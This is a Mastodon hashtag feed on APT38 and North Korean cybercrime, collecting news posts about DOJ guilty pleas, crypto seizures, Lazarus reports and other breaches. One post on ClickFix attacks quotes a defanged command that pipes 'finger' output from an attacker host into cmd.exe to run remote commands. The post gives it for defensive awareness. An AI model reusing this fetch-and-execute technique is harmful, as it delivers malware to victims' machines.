#APT38

Ars Technica Newsarstechnica@c.im
2025-11-17

5 plead guilty to laptop farm and ID theft scheme to land North Koreans US IT jobs arstechni.ca/DtFP #NorthKorea #Security #Biz&IT #itjobs #apt38 #fraud

2025-11-17

DOJ announces new actions targeting illicit DPRK-linked schemes, including identity fraud enabling remote IT work at 136+ U.S. companies and APT38 crypto heists exceeding $15M.

Key elements:
• Multiple guilty pleas (U.S. & international)
• Unauthorized remote access + identity misuse
• Cryptocurrency laundering + ongoing seizure efforts
• DOJ, FBI & NSD coordination under DPRK RevGen initiative
Thoughts on improving remote-work identity vetting?
👍 Follow for more verified, unbiased cyber reporting.

#infosec #APT38 #Cybercrime #ThreatIntel #DOJ #NorthKorea #SecurityOps #CyberPolicy #DigitalForensics

Justice Department Announces Nationwide Actions to Combat Illicit North Korean Government Revenue Generation
AllAboutSecurityallaboutsecurity
2025-11-16

USA zerschlagen nordkoreanisches IT-Betrugsnetzwerk – landesweite Maßnahmen gegen Regime-Finanzierung

Laut Gerichtsunterlagen unterstützten US- und ukrainische Mittelsmänner nordkoreanische IT-Fachkräfte dabei, sich mithilfe gestohlener oder gefälschter Identitäten bei US-Unternehmen als Remote-Worker auszugeben.

all-about-security.de/usa-zers

2025-11-15

Morning, cyber pros! It's been a bit light on news over the last 24 hours, but we've still got some critical updates to chew on. We're looking at a major data breach, an actively exploited RCE vulnerability, an old protocol making a malicious comeback, and a significant legal crackdown on North Korean illicit activities. Let's dive in:

Logitech Hit by Clop Extortion ⚠️
- Hardware giant Logitech has confirmed a data breach following an extortion claim by the Clop gang, who leaked 1.8 TB of data.
- The breach stemmed from a third-party zero-day vulnerability, likely CVE-2025-61882 in Oracle E-Business Suite, which Clop actively exploited in July 2025.
- While Logitech states no sensitive national ID or credit card data was compromised, the incident highlights Clop's consistent use of zero-days in mass data theft campaigns, previously seen with Accellion, GoAnywhere, and MOVEit.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu

RondoDox Botnet Exploiting XWiki RCE 🛡️
- The RondoDox botnet is actively exploiting CVE-2025-24893, a critical eval injection vulnerability (CVSS 9.8) in unpatched XWiki instances, to achieve arbitrary code execution.
- This flaw allows any guest user to execute remote code via a request to the "/bin/get/Main/SolrSearch" endpoint, and has been in the wild since at least March 2025.
- CISA added this to its KEV catalog, urging federal agencies to patch by November 20th. Exploitation attempts have surged, with RondoDox adding these devices to its botnet for DDoS attacks, alongside other actors deploying crypto miners and reverse shells.

📰 The Hacker News | thehackernews.com/2025/11/rond

'Finger' Protocol Abused for Malware Delivery 🕵️
- Threat actors are leveraging the decades-old 'finger' protocol (TCP port 79) to retrieve and execute remote commands on Windows devices in recent ClickFix malware attacks.
- The technique involves piping the output of a 'finger' command (e.g., `finger vke@finger.cloudmega[.]org`) directly into `cmd.exe`, causing the retrieved commands to run locally.
- Observed campaigns deliver Python-based infostealers or NetSupport Manager RAT, with some variants including anti-analysis checks for tools like Wireshark and Process Hacker. Defenders should block outgoing traffic to TCP port 79.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu

US Cracks Down on North Korean IT Worker Fraud ⚖️
- Five U.S. citizens have pleaded guilty to assisting North Korea's illicit revenue generation by enabling IT worker fraud, impacting over 136 U.S. companies and generating $2.2 million for the DPRK regime.
- The schemes involved using stolen U.S. identities, hosting company laptops in "laptop farms," and facilitating remote access to make it appear workers were in the U.S.
- This legal action, alongside the forfeiture of over $15 million in cryptocurrency stolen by APT38 (BlueNoroff), underscores ongoing efforts to disrupt North Korea's funding for its weapons programmes.

📰 The Hacker News | thehackernews.com/2025/11/five

#CyberSecurity #ThreatIntelligence #DataBreach #Clop #Ransomware #ZeroDay #Vulnerability #RCE #XWiki #Botnet #DDoS #Malware #FingerProtocol #ClickFix #NorthKorea #DPRK #APT38 #BlueNoroff #Cybercrime #InfoSec #IncidentResponse #PatchManagement

2025-11-15

DOJ: 5 guilty pleas tied to North Korea’s IT worker scheme. 136 U.S. companies hit, $2.2M earned, and $15M in stolen crypto seized from APT38/Lazarus operations.

#CyberSecurity #NorthKorea #APT38 #DOJ #ThreatIntel #CryptoCrime

Multiple US citizens plead guilty to helping North Korean IT workers earn $2 million
2025-10-19

📢 Lazarus (APT38) : profil actualisé, TTPs et exploitation de zero-days
📝 Selon Picus Security, ce billet d’analyse présente un panorama actualisé du groupe Lazarus (APT38/Hidden Cobra), ses cibles, ses opérations...
📖 cyberveille : cyberveille.ch/posts/2025-10-1
🌐 source : picussecurity.com/resource/blo
#APT38 #IOC #Cyberveille

2025-06-30

"Lazarus Phishing Campaign Detected (APT38)" published by BretWitt. #APT38, #Youtube, #DPRK, #CTI youtube.com/watch?v=py4KMWYCgPk

Anonymous 🐈️🐾☕🍵🏴🇵🇸 :af:youranonriots@kolektiva.social
2025-06-28

Uncovered: Lazarus Group's #APT38 uses Cosmic Rust malware to target macOS devices, linking back to known C&C servers. This highlights ongoing threats from North Korean hackers involved in global financial attacks. 💻💥 #LazarusGroup #Korea hendryadrian.com/apt38-infrast

2025-04-14

"Unpacking APT38: Static and Dynamic Analysis of Lazarus Group Malware" published by DionAlexander. #APT38, #DPRK, #CTI medium.com/@InfoSecDion/unpack

Anonymous 🐈️🐾☕🍵🏴🇵🇸 :af:youranonriots@kolektiva.social
2025-02-27

#FBI has confirmed that #NorthKorean hackers stole $1.5 billion from cryptocurrency exchange #Bybit on Friday in the largest crypto heist recorded until now.
#LazarusGroup #APT38 #CyberCrime bleepingcomputer.com/news/secu

Anonymous 🐈️🐾☕🍵🏴🇵🇸 :af:youranonriots@kolektiva.social
2025-02-25

#OpenAI says it blocked several North Korean hacking groups from using its #ChatGPT platform to research future targets and find ways to hack into their networks.
#APT38 #CyberAttacks #CyberAlert #Hacking bleepingcomputer.com/news/secu

2025-01-06
2024-10-08

"USA v. BITCOIN AND BTC.B SEIZED FROM EIGHT TRANSACTION HASHES AT CRYPTOCURRENCY BRIDGE-1" published by USJustice. #Cryptocurrency, #Stake, #APT38, #Lazarus, #DPRK, #CTI regmedia.co.uk/2024/10/07/stak

2024-10-08

"USA v. APPROXIMATELY 1,694,395.463328 OF TETHER CRYPTOCURRENCY" published by USJustice. #Cryptocurrency, #Deribit, #APT38, #Lazarus, #DPRK, #CTI regmedia.co.uk/2024/10/07/deri

Marcel SIneM(S)USsimsus@social.tchncs.de
2024-02-20
2023-11-30

BitCoins To Bombs: North Korea Funds Military With Billions In Stolen Cryptocurrency - A report from the firm Recorded Future finds that billions in gains from cryptocurrency h... feeds.feedblitz.com/~/84310790 #publishedresearch #cryptocurrency #recordedfuture #spear-phishing #lazarusgroup #technologies #northkorea #topstories #government #companies #spotlight #reports #apt38

2023-10-10

"Assessed Cyber Structure and Alignments of North Korea in 2023" published by Mandiant. #Trend, #APT38, #UNC1720, #APT43, #APT37, #UNC4899, #UNC614, #UNC1069, #TEMP.Hermit, #CTI, #OSINT, #LAZARUS mandiant.com/resources/blog/no

2023-09-30

"Anticipating File-Borne Threats: How Deep File Inspection Technology Will Shape the Future of Cyber Defense" published by Inquest. #Trend, #APT37, #Kimsuky, #APT38, #CTI, #OSINT, #LAZARUS inquest.net/blog/anticipating-

Client Info

Server: https://mastodon.social
Version: 2025.07
Repository: https://github.com/cyevgeniy/lmst